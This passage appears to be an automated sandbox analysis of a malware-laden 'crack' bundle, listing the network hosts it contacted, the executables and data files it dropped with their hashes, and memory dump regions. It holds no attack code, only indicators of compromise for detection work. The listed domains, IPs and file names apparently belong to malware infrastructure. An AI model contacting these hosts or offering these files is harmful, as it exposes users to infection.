| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | oldhorse.info | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| SG | 37.0.10.244:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp |
Files
memory/2788-0-0x00000000000C0000-0x00000000000D8000-memory.dmp
memory/2864-5-0x00000000005D0000-0x00000000006B5000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/2836-19-0x0000000000280000-0x0000000000365000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
| MD5 | 51ef03c9257f2dd9b93bfdd74e96c017 |
| SHA1 | 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34 |
| SHA256 | 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf |
| SHA512 | 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\JOzWR.dat
| MD5 | 12476321a502e943933e60cfb4429970 |
| SHA1 | c71d293b84d03153a1bd13c560fca0f8857a95a7 |
| SHA256 | 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29 |
| SHA512 | f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc |
memory/2172-77-0x0000000000400000-0x0000000000983000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/2172-89-0x0000000000400000-0x0000000000983000-memory.dmp
memory/860-110-0x0000000000B70000-0x0000000000D46000-memory.dmp
memory/2172-108-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-107-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2172-105-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-103-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-101-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-99-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-111-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-114-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-97-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-122-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-96-0x0000000000400000-0x0000000000983000-memory.dmp
\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/2172-130-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-131-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-92-0x0000000000400000-0x0000000000983000-memory.dmp
\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
memory/1068-169-0x0000000000940000-0x0000000000960000-memory.dmp
memory/1212-167-0x0000000001290000-0x0000000001298000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/840-187-0x0000000003F60000-0x00000000041C7000-memory.dmp
memory/840-186-0x0000000003F60000-0x00000000041C7000-memory.dmp
memory/1688-188-0x0000000000400000-0x0000000000667000-memory.dmp
memory/840-185-0x0000000003F60000-0x00000000041C7000-memory.dmp
memory/840-184-0x0000000003F60000-0x00000000041C7000-memory.dmp
memory/1992-166-0x000000013FA50000-0x000000013FA60000-memory.dmp
memory/1068-191-0x0000000000150000-0x000000000016A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab1A25.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 159ecc509d6a35faa22c4a151df3f057 |
| SHA1 | adeaf921fac0edec67abf854b7d4104d8707526b |
| SHA256 | fc71c207dbeb505020afc7729d4ff1e3666e0c9fbfe27360dcea1d5d14788f63 |
| SHA512 | a1b0a09f34a70ab18fda710d118a58ef4eaf0191d75101fbceda2a39ad655f981fc27a87ab1af55c82ace968860854b7893e97d8bafc65cc859bb718d67c881d |
C:\Users\Admin\AppData\Local\Temp\Tar1AF3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2784-209-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2172-210-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-211-0x0000000000400000-0x0000000000983000-memory.dmp
memory/2172-212-0x0000000000400000-0x0000000000983000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\potato.dat
| MD5 | 5e4e6b664563bf1b7f9ed844280507e5 |
| SHA1 | 3c5a37e8af1964d87898c590f598d95779ae5bc2 |
| SHA256 | 25ad9ded5f385b5bbe35029a9c990d0a541e9a23058ae545bb3ae0573509a82e |
| SHA512 | 9cdb5213613325d5aac931a6e43242f1a642d1cfdaa8540907aaf79bdbc16a4188e2416875985934d330ab360c5dd5b276543b8f73e41106e317f105a8f041c9 |
memory/1688-219-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2276-218-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/1992-224-0x0000000000650000-0x000000000065E000-memory.dmp
memory/2708-231-0x000000013F750000-0x000000013F760000-memory.dmp
memory/1688-233-0x0000000000400000-0x0000000000667000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/2516-263-0x0000000000160000-0x000000000017E000-memory.dmp
memory/2976-252-0x0000000000400000-0x0000000002B4E000-memory.dmp
memory/2516-264-0x00000000003E0000-0x00000000003FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
memory/2664-279-0x000000013F640000-0x000000013F646000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | cd497d63ebb26b517399def2adbe9649 |
| SHA1 | c89c864c307c9fa5f6828c3793234af86cad4494 |
| SHA256 | ebf6e92a8c9f713b2cb6e24593ca755e5cc60c4d8a708cbd96088c6c745d6143 |
| SHA512 | 15198e24b5814356633d6fefcf16e53c0a057a3dd8ed313cbf96899570bbf9d240a305800f1f02ce9922d2e566b3004daa8a868bece88f0b58a13881504f2506 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cf65056f7ed56237f0087a152181e89e |
| SHA1 | 1d5c07b564c7da1204df557f24dbcba2d96d40f5 |
| SHA256 | e7aad286f60d402e6d1e57b5f89b40c150578098fea7a9f60ac37ce39018b4f3 |
| SHA512 | 4c9cd3ac0b8e473331e7e96a1b045acb696117945ce6139cc4f4718bd4af1dcd3fd2e1a409ab02c7a0ad0fd713624bc825a71dbceaeb71ff694a94b2863576d7 |
memory/840-429-0x0000000003F60000-0x00000000041C7000-memory.dmp
memory/840-430-0x0000000003F60000-0x00000000041C7000-memory.dmp